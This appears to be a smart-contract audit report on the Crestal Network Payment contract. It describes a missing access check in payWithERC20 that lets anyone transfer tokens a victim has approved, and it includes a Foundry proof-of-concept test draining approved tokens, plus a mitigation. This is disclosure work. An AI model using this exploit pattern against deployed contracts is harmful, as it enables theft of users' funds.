Mini Honeysuckle Orca

High

# missing  access controls in Payment::payWithERC20 result in attacker stealing victim's funds

### Summary

the function  Payment::payWithERC20 doesn't check if the fromAddress is the msg.sender so any attacker can initiate a transfer using a victim's address as fromAddress stealing there funds 

### Root Cause

the function Payment::payWithERC20 doesn't check that msg.sender is the fromAddress

[code](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/Payment.sol#L25C27-L25C108)

### Internal Pre-conditions

victim needs to approve the transfer

### External Pre-conditions

victim approving the transfer

### Attack Path

victim approves the contract to spend the money 

 attacker calls the payWithERC20 
provides address erc20TokenAddress, uint256 amount, address fromAddress, address toAddress(attacker address)
drains the victim(fromAddress)'s funds


### Impact

an attacker can steal a victim's funds


### PoC


create a test folder and paste the following code in it and run `forge test`

```solidity

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.26;

import "forge-std/Test.sol";
import "../src/Payment.sol"; 
import "@openzeppelin/contracts/token/ERC20/ERC20.sol";

// Mock ERC20 token for testing
contract MockERC20 is ERC20 {
    constructor(string memory name, string memory symbol) ERC20(name, symbol) {
        _mint(msg.sender, 1000e18); // Mint tokens to deployer
    }
}

contract PaymentTest is Test { 
    Payment payment; 
    MockERC20 mockERC20;

    address alice = address(0x1234);
    address bob = address(0x5678);
    address attacker = address(0x9999);

    function setUp() public {
        payment = new Payment(); 
        mockERC20 = new MockERC20("MockToken", "MTK");

        // Fund Alice with mock tokens
        mockERC20.transfer(alice, 100e18);
    }

 
    function testUnauthorizedTransferWithoutAccessControl() public {
        // Deploy a vulnerable version of the contract (no access controls)
        payment = new Payment(); 

        // Alice approves the contract to spend her tokens
        vm.startPrank(alice);
        mockERC20.approve(address(payment), 50e18);
        vm.stopPrank();

        // Attacker tries to transfer tokens from Alice to Bob
        vm.startPrank(attacker);
        payment.payWithERC20(address(mockERC20), 50e18, alice, bob);

        // Check balances
        assertEq(mockERC20.balanceOf(alice), 50e18); // Alice's balance is reduced
        assertEq(mockERC20.balanceOf(bob), 50e18);   // Bob receives the tokens
        vm.stopPrank();
    }
}

```

### Mitigation

add a check to confirm that the msg.sender is fromAddress 